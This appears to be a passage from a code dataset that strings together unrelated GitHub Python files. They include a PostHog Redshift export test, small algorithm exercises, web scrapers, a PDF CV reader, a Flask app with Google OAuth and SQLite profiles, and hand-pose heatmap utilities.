override_settings(BATCH_EXPORT_REDSHIFT_UPLOAD_CHUNK_SIZE_BYTES=5 * 1024**2):\n await activity_environment.client.execute_workflow(\n RedshiftBatchExportWorkflow.run,\n inputs,\n id=workflow_id,\n task_queue=settings.TEMPORAL_TASK_QUEUE,\n retry_policy=RetryPolicy(maximum_attempts=1),\n execution_timeout=dt.timedelta(seconds=10),\n )\n\n runs = await afetch_batch_export_runs(batch_export_id=redshift_batch_export.id)\n assert len(runs) == 1\n\n run = runs[0]\n assert run.status == \"Completed\"\n\n await assert_events_in_redshift(\n psycopg_connection,\n redshift_config[\"schema\"],\n table_name,\n events=events,\n exclude_events=exclude_events,\n )\n\n\n@pytest.mark.parametrize(\n \"value,expected\",\n [\n ([1, 2, 3], [1, 2, 3]),\n (\"hi\\t\\n\\r\\f\\bhi\", \"hi hi\"),\n ([[\"\\t\\n\\r\\f\\b\"]], [[\"\"]]),\n ((\"\\t\\n\\r\\f\\b\",), (\"\",)),\n ({\"\\t\\n\\r\\f\\b\"}, {\"\"}),\n ({\"key\": \"\\t\\n\\r\\f\\b\"}, {\"key\": \"\"}),\n ({\"key\": [\"\\t\\n\\r\\f\\b\"]}, {\"key\": [\"\"]}),\n ],\n)\ndef test_remove_escaped_whitespace_recursive(value, expected):\n \"\"\"Test we remove some whitespace values.\"\"\"\n assert remove_escaped_whitespace_recursive(value) == expected\n","repo_name":"PostHog/posthog","sub_path":"posthog/temporal/tests/batch_exports/test_redshift_batch_export_workflow.py","file_name":"test_redshift_batch_export_workflow.py","file_ext":"py","file_size_in_byte":13416,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"33447636167","text":"#!/usr/bin/python2.7\nimport re\n\nnum_inputs = 0\nall_ins = []\nnumber_pattern = re.compile('([7-9][0-9]{9})')\ndef main():\n num_inputs = getNumInputs()\n all_ins = getInputs(num_inputs)\n done(all_ins)\ndef getNumInputs():\n return int(raw_input())\ndef getInputs(num_inputs):\n for i in range(0,num_inputs):\n inp = str(raw_input())\n all_ins.append(parse(inp))\n return all_ins\ndef parse(inp):\n\tif(len(inp)>10):\n\t\treturn \"NO\"\n\telif(number_pattern.match(inp)):\n\t\treturn \"YES\"\n\telse:\n\t\treturn \"NO\"\n\ndef done(all_ins):\n\tfor s in all_ins:\n\t\tprint(s)\nmain()\n","repo_name":"dscottboggs/practice","sub_path":"HackerRank/phoneNumbers/phoneNumbers2.py","file_name":"phoneNumbers2.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11754093512","text":"def count_unclear_player(stages, n):\n # n에 대해 count했을 때 일치하는 것의 갯수 return\n try:\n start = stages.index(n)\n except ValueError:\n return 0\n end_index = start\n for i in range(start, len(stages)):\n end_index = i\n if stages[i] > n:\n end_index = i - 1\n break\n return end_index - start + 1\n\n\ndef count_instage_player(stages, n):\n # n이상에 대해 count 한 것의 갯수 return\n try:\n start = stages.index(n)\n except ValueError:\n return 0\n return len(stages) - start\n\n\ndef solution(N, stages):\n answer = []\n for i in range(N):\n answer.append(list([0,i+1]))\n stages.sort()\n for i in range(1, len(answer) + 1):\n instage = count_instage_player(stages, i)\n unclear = count_unclear_player(stages, i)\n if instage == 0:\n answer[i - 1][0] = 0\n else:\n answer[i - 1][0] = unclear / instage\n answer.sort(key = lambda x: (-x[0], x[1]))\n result = list(map(lambda x: x[1], answer))\n return result\n\nprint(solution(5,[2,1,2,6,2,4,3,3]))","repo_name":"ybkim-dev/algorithms","sub_path":"기출문제/정렬 문제/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14767423506","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nfrom utils.soundex import get_soundex\n\nclass TierCities:\n def __init__(self):\n self.url=\"https://en.wikipedia.org/wiki/Classification_of_Indian_cities\"\n self.tier_cities = None\n self. synonym_names = {}\n self.soundex_dict_tier = {}\n self.prepareValidCityList()\n self.find_synonym()\n\n def prepareValidCityList(self):\n r = requests.get(self.url,verify=False)\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n tier_cities=list(map(lambda x:x.text.lower(),soup.find('table',class_='wikitable').find_all('a')))\n\n self.soundex_dict_tier={get_soundex(name):name for name in tier_cities}\n\n def find_synonym(self):\n url = 'https://www.scoopwhoop.com/news/whats-in-a-name/#.45rdcz1m2'\n r=requests.get(url,verify=False)\n containers=BeautifulSoup(r.text,'html.parser').find('div',class_='article-body').find_all('h2')\n\n for container in containers:\n if re.search(r'^[0-9]{1,2}.+', container.text.strip()):\n self.synonym_names[container.text.strip().split()[1].lower()] = container.text.strip().split()[-1].lower()\n\n self.soundex_dict_syn={get_soundex(key):self.synonym_names[key] for key in self.synonym_names}\n\n def validate_city(self, city_name):\n city_name = city_name.lower()\n loc_soundex=get_soundex(city_name)\n val=False\n if loc_soundex in self.soundex_dict_tier.keys():\n val=True\n city_name= self.soundex_dict_tier[loc_soundex]\n if loc_soundex in self.soundex_dict_syn.keys() and not val:\n val=True\n city_name= self.soundex_dict_syn[loc_soundex]\n\n return val, city_name\n\n\n\nif __name__ == '__main__':\n I = TierCities()\n I.validate_city('allahabad')\n","repo_name":"BharathSD/RestaurantSearch_ChatBot","sub_path":"utils/extractTierCities.py","file_name":"extractTierCities.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37315823892","text":"\"\"\"\n83. 删除排序链表中的重复元素\n存在一个按升序排列的链表,给你这个链表的头节点 head ,请你删除所有重复的元素,使每个元素 只出现一次 。\n返回同样按升序排列的结果链表。\n\n示例 1:\n输入:head = [1,1,2]\n输出:[1,2]\n\n示例 2:\n输入:head = [1,1,2,3,3]\n输出:[1,2,3]\n\n提示:\n链表中节点数目在范围 [0, 300] 内\n-100 <= Node.val <= 100\n题目数据保证链表已经按升序排列\n\ndate: 2021年3月26日\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n dum_head = ListNode(-1, head)\n cur = dum_head.next\n while cur:\n next_n = cur.next\n if not next_n: break\n if cur.val == next_n.val:\n while next_n and cur.val == next_n.val:\n next_n = next_n.next\n cur.next = next_n\n else:\n cur = cur.next\n return dum_head.next\n\n","repo_name":"Aiooon/MyLeetcode","sub_path":"python/083. 删除排序链表中的重复元素.py","file_name":"083. 删除排序链表中的重复元素.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12127201895","text":"import pytest\nimport requests\nfrom unittest.mock import patch\nfrom job_scrapper import JobScraper, Level, NoListingException\n\n@pytest.fixture\ndef mock_get_request():\n with patch('requests.get') as mock_get:\n yield mock_get\n\ndef test_get_job_ids(mock_get_request):\n # Mock the requests.get method to return the correct response body\n mock_response = mock_get_request.return_value\n mock_response.status_code = 200\n mock_response.text = \"\"\"\n \n \n \n
      • \n \n
      • \n
      • \n \n
      • \n \n \n \"\"\"\n\n # Call the method that uses requests.get\n job_scraper = JobScraper(\"test\", False, Level.ENTRY, \"day\")\n job_ids = job_scraper.get_job_ids(2)\n\n # Assertions\n assert isinstance(job_ids, list)\n assert len(job_ids) == 2\n assert job_ids == [\"3645698557\", \"3645757263\"]\n \n\ndef test_get_job_ids_no_result(mock_get_request):\n # Mock the requests.get method to return the correct response body\n mock_response = mock_get_request.return_value\n mock_response.status_code = 200\n mock_response.text = \"\"\"\n \n \n \n \n \n \"\"\"\n\n # Assertions\n job_scraper = JobScraper(\"test\", False, Level.ENTRY, \"day\")\n with pytest.raises(NoListingException):\n job_scraper.get_job_ids(2)","repo_name":"jyl0725/job-scrapper","sub_path":"test/test_job_seeker.py","file_name":"test_job_seeker.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7091355067","text":"#dictionary class that keeps track of all words in a given language as well as assigning a\r\n#token to them\r\n\r\nPAD_TOKEN = 0\r\nSOS_TOKEN = 1\r\nEOS_TOKEN = 2\r\n\r\n#from pytorch's documentation website on NLP\r\nclass Dictionary:\r\n def __init__(self, name):\r\n self.name = name\r\n self.word2index = {}\r\n self.word2count = {}\r\n self.index2word = {PAD_TOKEN: \"PAD\", SOS_TOKEN: \"SOS\", EOS_TOKEN: \"EOS\"}\r\n self.n_count = 3\r\n\r\n def add_sentence(self, sentence):\r\n for word in sentence.split(' '):\r\n self.add_word(word)\r\n\r\n def add_word(self, word):\r\n if word not in self.word2index:\r\n self.word2index[word] = self.n_count\r\n self.word2count[word] = 1\r\n self.index2word[self.n_count] = word \r\n self.n_count += 1\r\n else:\r\n self.word2count[word] += 1\r\n","repo_name":"u7javed/Transformer-Multi-Language-Translator","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"14842630457","text":"# import modules\nimport os\nfrom PyPDF2 import PdfReader\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n# Define a class to read CVs from a directory\nclass CVsReader:\n \n # Initialize the class with the directory path where CVs are located\n def __init__(self, cvs_directory_path):\n self.cvs_directory_path = cvs_directory_path\n\n\n # Method to read new CV files from the given directory\n def _read_new_directory_files(self):\n\n # Store the directory path of CVs\n cvs_directory_path = self.cvs_directory_path\n\n # Store the path of the CSV file where previously extracted CVs are stored\n previously_extracted_cvs_path = '../Output/CVs_Info_Extracted.csv'\n\n # Get a list of all files in the CVs directory\n all_cvs = os.listdir(cvs_directory_path)\n\n # If there is a CSV file of previously extracted CVs\n if os.path.isfile(previously_extracted_cvs_path):\n\n # Read that file and get the filenames of CVs\n previously_extracted_cvs = pd.read_csv(previously_extracted_cvs_path, usecols = ['CV_Filename'])\n\n # Convert those filenames to a list\n previously_extracted_cvs = previously_extracted_cvs.CV_Filename.to_list()\n\n # Filter out the CVs that have already been processed\n all_cvs = [cv for cv in all_cvs if cv not in previously_extracted_cvs]\n\n # Print the number of CVs that are left to be processed\n print(f'Number of CVs to be processed: {len(all_cvs)}')\n\n # Return the list of CVs to be processed\n return all_cvs\n\n\n # Method to extract text from a PDF file\n def _extract_text_from_pdf(self, pdf_path):\n\n # Print the name of the file being processed\n print(f\"Extracting text from file: {pdf_path}\")\n\n # Create a PdfReader object\n pdf = PdfReader(pdf_path)\n\n # Initialize an empty string to store the extracted text\n text = ''\n\n # Loop over the pages in the pdf\n for page in range(len(pdf.pages)):\n\n # Extract text from each page and append it to the text string\n text += pdf.pages[page].extract_text()\n\n # Return the extracted text\n return text\n\n \n # Define a method that reads PDF content from a directory\n def _read_pdfs_content_from_directory(self, directory_path):\n \n # Initialize a dictionary to hold the filenames and contents of the CVs\n data = {'CV_Filename': [], 'CV_Content': []}\n \n # Read all the new files in the directory\n all_cvs = self._read_new_directory_files()\n \n # For each file in the directory\n for filename in tqdm(all_cvs, desc='CVs'):\n # If the file is a PDF\n if filename.endswith('.pdf'):\n # Construct the full file path\n file_path = os.path.join(directory_path, filename)\n try:\n # Extract the text content from the PDF\n content = self._extract_text_from_pdf(file_path)\n # Add the filename to the dictionary\n data['CV_Filename'].append(filename)\n # Add the content to the dictionary\n data['CV_Content'].append(content)\n except Exception as e:\n # Print the exception if there is an error in reading the file\n print(f\"Error reading file {filename}: {e}\")\n # Return the data as a DataFrame\n return pd.DataFrame(data)\n\n\n # Define a method that reads and cleans CVs\n def read_cv(self):\n \n # Print a message indicating the start of the CV extraction process\n print('---- Excecuting CVs Content Extraction Process ----')\n \n # Read the PDFs from the directory and store their content in a DataFrame\n df = self._read_pdfs_content_from_directory(self.cvs_directory_path)\n \n # Print a message indicating the start of the CV content cleaning process\n print('Cleaning CVs Content...')\n # Clean the CV content by replacing newline characters and trailing spaces with a single newline character\n df['CV_Content'] = df['CV_Content'].str.replace(r\"\\n(?:\\s*)\", \"\\n\", regex=True)\n\n # Print a message indicating the end of the CV extraction process\n print('CVs Content Extraction Process Completed!')\n print('----------------------------------------------')\n # Return the DataFrame\n return df","repo_name":"Aillian/ResumeGPT","sub_path":"ResumeGPT/OCR_Reader.py","file_name":"OCR_Reader.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"14347110943","text":"# Python standard libraries\r\nimport json\r\nimport os\r\nimport sqlite3\r\n\r\n# Third-party libraries\r\nfrom flask import Flask, render_template, redirect, request, url_for\r\nfrom flask_login import (\r\n LoginManager,\r\n current_user,\r\n login_required,\r\n login_user,\r\n logout_user,\r\n)\r\nfrom oauthlib.oauth2 import WebApplicationClient\r\nimport requests\r\n\r\n# Internal imports\r\nfrom db import init_db_command\r\nfrom user import User\r\n\r\n# .env\r\nfrom dotenv import load_dotenv\r\nload_dotenv('.env')\r\n\r\nGOOGLE_CLIENT_ID = os.getenv('GOOGLE_CLIENT_ID')\r\nGOOGLE_CLIENT_SECRET = os.getenv('GOOGLE_CLIENT_SECRET')\r\nGOOGLE_DISCOVERY_URL = \"https://accounts.google.com/.well-known/openid-configuration\"\r\n\r\napp = Flask(__name__)\r\napp.secret_key = os.urandom(24)\r\ndb_name = \"database/UberNeeds.db\"\r\n\r\n# User session management setup\r\n# https://flask-login.readthedocs.io/en/latest\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\n\r\n# Naive database setup\r\ntry:\r\n init_db_command()\r\nexcept sqlite3.OperationalError:\r\n # Assume it's already been created\r\n pass\r\n\r\n# OAuth 2 client setup\r\nclient = WebApplicationClient(GOOGLE_CLIENT_ID)\r\n\r\n# Flask-Login helper to retrieve a user from our db\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.get(user_id)\r\n\r\n@app.route(\"/\")\r\ndef homepage():\r\n\treturn render_template(\"homepage.html\", google_user=current_user)\r\n\r\ndef get_google_provider_cfg():\r\n return requests.get(GOOGLE_DISCOVERY_URL).json()\r\n\r\n@app.route(\"/login\")\r\ndef login():\r\n\t# return render_template(\"login.html\")\r\n\r\n\t# Find out what URL to hit for Google login\r\n google_provider_cfg = get_google_provider_cfg()\r\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\r\n\r\n # Use library to construct the request for Google login and provide\r\n # scopes that let you retrieve user's profile from Google\r\n request_uri = client.prepare_request_uri(\r\n authorization_endpoint,\r\n redirect_uri=request.base_url + \"/callback\",\r\n scope=[\"openid\", \"email\", \"profile\"],\r\n )\r\n return redirect(request_uri)\r\n\r\n@app.route(\"/login/callback\")\r\ndef callback():\r\n # Get authorization code Google sent back to you\r\n code = request.args.get(\"code\")\r\n\r\n # Find out what URL to hit to get tokens that allow you to ask for\r\n # things on behalf of a user\r\n google_provider_cfg = get_google_provider_cfg()\r\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\r\n\r\n # Prepare and send a request to get tokens! Yay tokens!\r\n token_url, headers, body = client.prepare_token_request(\r\n token_endpoint,\r\n authorization_response=request.url,\r\n redirect_url=request.base_url,\r\n code=code\r\n )\r\n token_response = requests.post(\r\n token_url,\r\n headers=headers,\r\n data=body,\r\n auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET),\r\n )\r\n\r\n # Parse the tokens!\r\n client.parse_request_body_response(json.dumps(token_response.json()))\r\n\r\n # Now that you have tokens (yay) let's find and hit the URL\r\n # from Google that gives you the user's profile information,\r\n # including their Google profile image and email\r\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\r\n uri, headers, body = client.add_token(userinfo_endpoint)\r\n userinfo_response = requests.get(uri, headers=headers, data=body)\r\n\r\n # You want to make sure their email is verified.\r\n # The user authenticated with Google, authorized your\r\n # app, and now you've verified their email through Google!\r\n if userinfo_response.json().get(\"email_verified\"):\r\n unique_id = userinfo_response.json()[\"sub\"]\r\n users_email = userinfo_response.json()[\"email\"]\r\n picture = userinfo_response.json()[\"picture\"]\r\n users_name = userinfo_response.json()[\"given_name\"]\r\n else:\r\n return \"User email not available or not verified by Google.\", 400\r\n\r\n # Create a user in your db with the information provided\r\n # by Google\r\n user = User(\r\n id_=unique_id, name=users_name, email=users_email, profile_pic=picture\r\n )\r\n\r\n # Doesn't exist? Add it to the database.\r\n if not User.get(unique_id):\r\n User.create(unique_id, users_name, users_email, picture)\r\n\r\n # Begin user session by logging the user in\r\n login_user(user)\r\n\r\n # Send user back to homepage\r\n return redirect(url_for(\"homepage\"))\r\n\r\n@app.route(\"/logout\")\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for(\"homepage\"))\r\n\r\n@app.route(\"/profile\")\r\n@login_required\r\ndef profile():\r\n services_info = get_categories()\r\n user_services = get_user_services()\r\n checked_services = make_checked_services_list(user_services, services_info[0])\r\n return render_template(\"profile.html\", google_user=current_user, services=services_info[0], services_id=services_info[1], user_info=get_user_info(), checked_services=checked_services)\r\n\r\ndef make_checked_services_list(user_services, all_services):\r\n checked = {}\r\n for service in all_services:\r\n if service in user_services:\r\n checked[service] = \"Checked\"\r\n else:\r\n checked[service] = \"\"\r\n return checked\r\n\r\ndef get_user_services():\r\n conn = sqlite3.connect(\"database/UberNeeds.db\")\r\n statement = '''\r\n select Name from UsersCategories\r\n join Categories on UsersCategories.Categorie_id = Categories.id\r\n where User_id = ?\r\n '''\r\n cursor = conn.execute(statement, [current_user.id])\r\n data = []\r\n\r\n for row in cursor:\r\n data.append(row[0])\r\n\r\n conn.close()\r\n return data\r\n\r\ndef get_user_info():\r\n conn = sqlite3.connect(\"database/UberNeeds.db\")\r\n\r\n data = get_user_by_id(current_user.id, conn)\r\n\r\n if len(data) == 0:\r\n conn.execute(\"insert into Users (id) values (?)\", [current_user.id])\r\n conn.commit()\r\n\r\n data = get_user_by_id(current_user.id, conn)\r\n\r\n conn.close()\r\n return data[0]\r\n\r\ndef get_user_by_id(user_id, conn):\r\n cursor = conn.execute(\"select * from Users where id = ?\", [user_id])\r\n data = []\r\n\r\n for row in cursor:\r\n data.append((row[1], row[2], row[3]))\r\n \r\n return data\r\n\r\n@app.route(\"/save_user\", methods=['POST'])\r\ndef save_user():\r\n tel = request.form['tel']\r\n postalcode = request.form['postalcode']\r\n city = request.form['city']\r\n\r\n email = current_user.email\r\n user_id = User.get_userid_by_email(email)\r\n add_user_info(user_id, postalcode, city, tel)\r\n\r\n services = request.form.getlist('service')\r\n add_services_to_user(user_id, services)\r\n remove_services(services, user_id)\r\n return redirect(url_for(\"profile\"))\r\n\r\ndef remove_services(services_by_user, user_id):\r\n all_services = get_categories()\r\n statement = '''\r\n DELETE FROM UsersCategories\r\n WHERE User_id = ? and Categorie_id = ?\r\n '''\r\n\r\n for service in all_services[1]:\r\n if str(service) not in services_by_user:\r\n conn = sqlite3.connect(db_name)\r\n conn.execute(statement, [str(user_id), service])\r\n conn.commit()\r\n conn.close()\r\n\r\ndef add_services_to_user(user_id, services):\r\n conn = sqlite3.connect(db_name)\r\n\r\n statement_insert = 'insert into UsersCategories values (?, ?, ?)'\r\n for service in services:\r\n try:\r\n conn.execute(statement_insert, [user_id, service, -1])\r\n conn.commit()\r\n except sqlite3.IntegrityError:\r\n pass\r\n\r\n conn.close()\r\n\r\ndef add_user_info(user_id, postalcode, city, tel):\r\n conn = sqlite3.connect(db_name)\r\n statement_insert = 'insert into Users values (?, ?, ?, ?)'\r\n statement_update = '''\r\n update Users set \r\n PostalCode = ?,\r\n Location = ?,\r\n TelNumber = ?\r\n where Users.id = ?\r\n ''' \r\n\r\n try:\r\n conn.execute(statement_insert, [user_id, postalcode, city, tel])\r\n except sqlite3.IntegrityError:\r\n conn.execute(statement_update, [postalcode, city, tel, user_id])\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\ndef get_categories():\r\n conn = sqlite3.connect(db_name)\r\n cursor = conn.execute(\"select * from Categories\")\r\n services = []\r\n services_id = []\r\n\r\n for row in cursor:\r\n services.append(row[1])\r\n services_id.append(row[0])\r\n conn.close()\r\n\r\n return services, services_id\r\n\r\n@app.route(\"/categoriesfeed/\")\r\ndef categoriesfeed(category):\r\n category_id = get_id_of_category(category)\r\n conn = sqlite3.connect(db_name)\r\n statement = '''\r\n select Users.*, avgrating from Users\r\n join UsersCategories on Users.id = UsersCategories.User_id\r\n join Categories on UsersCategories.Categorie_id = Categories.id\r\n where Categories.Name = ?\r\n order by AvgRating desc\r\n '''\r\n cursor = conn.execute(statement, [category])\r\n data = {}\r\n\r\n for row in cursor:\r\n userid = row[0]\r\n\r\n data[userid] = []\r\n for element in row:\r\n data[userid].append(element)\r\n\r\n GoogleUser = User.get(userid)\r\n data[userid].extend([GoogleUser.name, GoogleUser.email, GoogleUser.profile_pic])\r\n conn.close()\r\n return render_template(\"categoriesfeed.html\", google_user=current_user, text=category, data=data)\r\n\r\ndef get_id_of_category(category):\r\n conn = sqlite3.connect(db_name)\r\n cursor = conn.execute(\"select id from Categories where Name = ?\", [category])\r\n category_id = \"\"\r\n\r\n for row in cursor:\r\n category_id = row[0]\r\n conn.close()\r\n\r\n return category_id\r\n\r\n@app.route(\"/about_us\")\r\ndef aboutus():\r\n\treturn render_template(\"about_us.html\", google_user=current_user)\r\n\r\n@app.route(\"/categories\")\r\ndef categories():\r\n\treturn render_template(\"categories.html\", categories=getcategories(), google_user=current_user)\r\n\r\n@app.route(\"/addcategorie\")\r\ndef addcategorie():\r\n\treturn render_template(\"addcategorie.html\", google_user=current_user)\r\n\r\ndef getcategories():\r\n\tconn = sqlite3.connect(\"database/UberNeeds.db\")\r\n\tcursor = conn.execute(\"select * from Categories\")\r\n\tdata = []\r\n\r\n\tfor row in cursor:\r\n\t\tdata.append({\"name\":row[1],\r\n\t\t\t\t\t\"description\": row[2]})\r\n\tconn.close()\r\n\r\n\treturn data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # here is starting of the development HTTP server\r\n # app.run(ssl_context=(\"cert.pem\", \"key.pem\"), host='0.0.0.0', port=8008)\r\n app.run(ssl_context=\"adhoc\", host='0.0.0.0', port=8008)","repo_name":"vives-projectweek-1-2020/Uber-Needs","sub_path":"flaskapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71133822889","text":"import json\nimport sys\nfrom malware_ml.database import DBLog\nfrom malware_ml.prepare_data import DEFAULT_TARGET, DEFAULT_ID\nfrom malware_ml.model import apply_model, load_model\nimport pandas as pd\n\nDEFAULT_MODEL_PATH = './models/lgbm.pkl'\nDEFAULT_DB_PATH = './database/log.db'\n\n\nif __name__ == '__main__':\n args = sys.argv\n if len(args) == 1:\n model_path = DEFAULT_MODEL_PATH\n else:\n model_path = sys.argv[-1]\n model = load_model(model_path)\n print('Send json string to get prediction.')\n print('Send \\'stop\\' string to finish.')\n db_log = DBLog(DEFAULT_DB_PATH)\n db_log.drop_table()\n n = 0\n # while True:\n d = pd.read_csv('../ML/data/train.csv', chunksize=1, nrows=1000)\n for i in d:\n input_string = i.to_json()\n if input_string == 'stop':\n break\n data = json.loads(input_string)\n # Если взять пример из датасета, то он будет содержать строковый индекс\n target = data.get(DEFAULT_TARGET)[str(n)]\n identifier = data.get(DEFAULT_ID)[str(n)]\n n += 1\n prediction = apply_model(model, data)\n db_log.insert(identifier, prediction, target)\n db_log.close()\n","repo_name":"zverkovboris/Malware-Prediction","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30578689259","text":"import numpy as np\nimport torch\nimport cv2\n\nRAW_IMG_SIZE=228\nMODEL_INPUT_SIZE=128\nMODEL_OUTPUT_SIZE=64\nHEATMAP_SIGMA=1\nN_JOINTS=21\nlambda_hm=1\n\ndef projectPoints(xyz, K):\n \"\"\"\n Projects 3D coordinates into image space.\n Function taken from https://github.com/lmb-freiburg/freihand\n \"\"\"\n xyz = np.array(xyz)\n K = np.array(K)\n uv = np.matmul(K, xyz.T).T\n return uv[:, :2] / uv[:, -1:]\n\ndef gen_heatmap(img, pt, sigma):\n\t\"\"\"\n\tfrom Minimal-Hand model\n\n generate heatmap based on pt coord\n\n :param img: original heatmap, zeros\n :type img: np (H,W) float32\n :param pt: keypoint coord\n :type pt: np (2,) int32\n :param sigma: guassian sigma\n :type sigma: float\n :return\n - generated heatmap, np (H, W) each pixel values id a probability\n - flag 0 or 1: indicate wheather this heatmap is valid(1)\n\n \"\"\"\n\t#pt = pt.astype(np.int32)\n\n # Check that any part of the gaussian is in-bounds\n\n\tvector = np.vectorize(np.int32)\n\tul = [(pt[0] - 3 * sigma), (pt[1] - 3 * sigma)]\n\tul = vector(ul)\n\tbr = [(pt[0] + 3 * sigma + 1), (pt[1] + 3 * sigma + 1)]\n\tbr = vector(br)\n\t\"\"\"\n\tif (\n\t ul[0] >= img.shape[1]\n\t or ul[1] >= img.shape[0]\n\t or br[0] < 0\n\t or br[1] < 0 ):\n\t # If not, just return the image as is\n\t print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\t return img, 0\n\t\"\"\"\n\n\t# Generate gaussian\n\tsize = 6 * sigma + 1\n\tx = np.arange(0, size, 1, float)\n\ty = x[:, np.newaxis]\n\tx0 = y0 = size // 2\n\tg = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))\n\t# Usable gaussian range\n\tg_x = max(0, -ul[0]), min(br[0], img.shape[1]) - ul[0]\n\tg_y = max(0, -ul[1]), min(br[1], img.shape[0]) - ul[1]\n\t# Image range\n\timg_x = max(0, ul[0]), min(br[0], img.shape[1])\n\timg_y = max(0, ul[1]), min(br[1], img.shape[0])\n\n\timg[img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], g_x[0]:g_x[1]]\n\treturn img, 1\n\ndef vector_to_heatmaps(keypoints):\n \"\"\"\n Creates 2D heatmaps from keypoint locations for a single image\n Input: array of size N_JOINTS x 2\n Output: array of size N_JOINTS x MODEL_IMG_SIZE x MODEL_IMG_SIZE\n \"\"\"\n heatmaps = np.zeros([N_JOINTS, MODEL_OUTPUT_SIZE, MODEL_OUTPUT_SIZE])\n for k, (x, y) in enumerate(keypoints):\n x, y = int(x * MODEL_OUTPUT_SIZE), int(y * MODEL_OUTPUT_SIZE)\n if (0 <= x < MODEL_OUTPUT_SIZE) and (0 <= y < MODEL_OUTPUT_SIZE):\n heatmaps[k, int(y), int(x)] = 1\n\n heatmaps = blur_heatmaps(heatmaps)\n return heatmaps\n\n\ndef blur_heatmaps(heatmaps):\n \"\"\"Blurs heatmaps using GaussinaBlur of defined size\"\"\"\n heatmaps_blurred = heatmaps.copy()\n for k in range(len(heatmaps)):\n if heatmaps_blurred[k].max() == 1:\n heatmaps_blurred[k] = cv2.GaussianBlur(heatmaps[k], (51, 51), 3)\n heatmaps_blurred[k] = heatmaps_blurred[k] / heatmaps_blurred[k].max()\n return heatmaps_blurred","repo_name":"htuannn/Monocular-Real-time-2D-Hand-Pose-Estimation","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26203802425","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nbase_test = \"test loss excel path\"\nbase_training = \"training loss excel path\"\n\ndef no_decoder_fun(file_path, runtime, error_type):\n reference = pd.read_excel(file_path)\n reference = reference[reference.runtime == runtime]\n reference.reset_index(drop=True, inplace=True)\n reference.index +=1\n for i in range(2,11):\n reference.at[i, error_type] = reference.iloc[0][error_type]\n\n reference[error_type].plot(label= \"No Decoder\")\n plt.legend()\n\ndef training_fun(error_type):\n \"\"\"error_type is in the format \"DTE\", that is, it is a string. Possible values are: DTE, DL, LDL, CL, LCL.\"\"\"\n plt.figure()\n for lr in [\"2e-4\", \"2e-5\", \"5e-4\", \"8e-5\"]:\n\n df2 = pd.read_excel(base_training+\"/\"+lr+'.xlsx')\n df2.dropna(inplace=True)\n df2 = df2[df2.runtime == 190]\n df2.reset_index(drop=True, inplace=True)\n df2.index +=1\n df2[error_type].plot(title= \"Training Accuracy\", label= lr)\n plt.ylabel(\"Accuracy under \"+error_type+\" (%)\")\n plt.xlabel(\"Epoch\")\n plt.xlim(1,10)\n plt.legend()\n no_decoder_fun(base_training+\"/no_decoder.xlsx\", 190, error_type)\n plt.grid()\n plt.show()\n\ndef test_fun(error_type):\n \"\"\"error_type is in the format \"DTE\", that is, it is a string. Possible values are: DTE, DL, LDL, CL, LCL.\"\"\"\n plt.figure()\n\n for lr in [\"2e-4\", \"2e-5\", \"5e-4\", \"8e-5\"]:\n df1= pd.read_excel(base_test+\"/\"+lr+'.xlsx')\n df1.dropna(inplace=True)\n df1 = df1[df1.runtime == 57]\n df1.reset_index(drop=True, inplace=True)\n df1.index +=1\n df1[error_type].plot(title= \"Test Accuracy\", label= lr)\n plt.ylabel(\"Accuracy under \"+error_type+\" (%)\")\n plt.xlabel(\"Epoch\")\n plt.xlim(1,10)\n plt.legend()\n\n no_decoder_fun(base_test+\"/no_decoder.xlsx\", 57, error_type)\n plt.grid()\n plt.show()\n\nfor i in [\"DTE\", \"DL\", \"LDL\", 